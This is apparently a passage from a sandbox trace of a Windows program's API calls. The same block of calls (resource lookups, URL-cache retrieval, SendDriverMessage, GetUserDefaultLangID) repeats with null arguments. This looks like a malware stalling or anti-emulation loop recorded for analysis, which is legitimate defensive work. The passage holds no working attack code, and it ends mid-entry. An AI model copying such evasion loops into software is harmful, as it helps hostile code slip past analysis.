0x0 [0185.748] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.748] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.748] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.748] GetUserDefaultLangID () returned 0x409 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.749] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.749] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.749] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.749] GetUserDefaultLangID () returned 0x409 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.749] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.749] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.749] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.749] GetUserDefaultLangID () returned 0x409 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.749] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.749] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.749] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.749] GetUserDefaultLangID () returned 0x409 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.749] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.749] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.749] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.749] GetUserDefaultLangID () returned 0x409 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.749] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.749] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.749] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.749] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.749] GetUserDefaultLangID () returned 0x409 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.749] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.750] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.750] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.750] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.750] GetUserDefaultLangID () returned 0x409 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.750] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.750] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.750] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.750] GetUserDefaultLangID () returned 0x409 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.750] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.750] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.750] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.750] GetUserDefaultLangID () returned 0x409 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.750] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.750] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.750] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.750] GetUserDefaultLangID () returned 0x409 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.750] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.750] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.750] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.750] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.750] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.751] GetUserDefaultLangID () returned 0x409 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.751] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.751] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.751] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.751] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.751] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.751] GetUserDefaultLangID () returned 0x409 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.751] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.751] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.751] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.751] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.751] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.751] GetUserDefaultLangID () returned 0x409 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.751] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.751] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.751] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.751] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.751] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.751] GetUserDefaultLangID () returned 0x409 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.751] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.751] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.752] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.752] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.752] GetUserDefaultLangID () returned 0x409 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.752] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.752] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.752] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.752] GetUserDefaultLangID () returned 0x409 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.752] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.752] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.752] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.752] GetUserDefaultLangID () returned 0x409 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.752] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.752] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.752] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.752] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.752] GetUserDefaultLangID () returned 0x409 [0185.752] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.753] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.753] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.753] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.753] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.753] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.753] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.753] GetUserDefaultLangID () returned 0x409 [0185.753] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.753] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.753] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.753] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.753] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.753] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.753] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.753] GetUserDefaultLangID () returned 0x409 [0185.753] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.753] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.753] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.753] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.753] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.753] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.753] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.754] GetUserDefaultLangID () returned 0x409 [0185.754] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.754] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.754] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.754] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.754] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.754] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.754] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.754] GetUserDefaultLangID () returned 0x409 [0185.754] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.754] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.754] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.754] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.754] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.754] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.754] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.754] GetUserDefaultLangID () returned 0x409 [0185.754] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.754] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.754] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.754] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.754] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.755] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.755] GetUserDefaultLangID () returned 0x409 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.755] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.755] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.755] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.755] GetUserDefaultLangID () returned 0x409 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.755] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.755] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.755] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.755] GetUserDefaultLangID () returned 0x409 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.755] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.755] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.755] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.755] GetUserDefaultLangID () returned 0x409 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.755] FindResourceExW (hModule=0x400000, 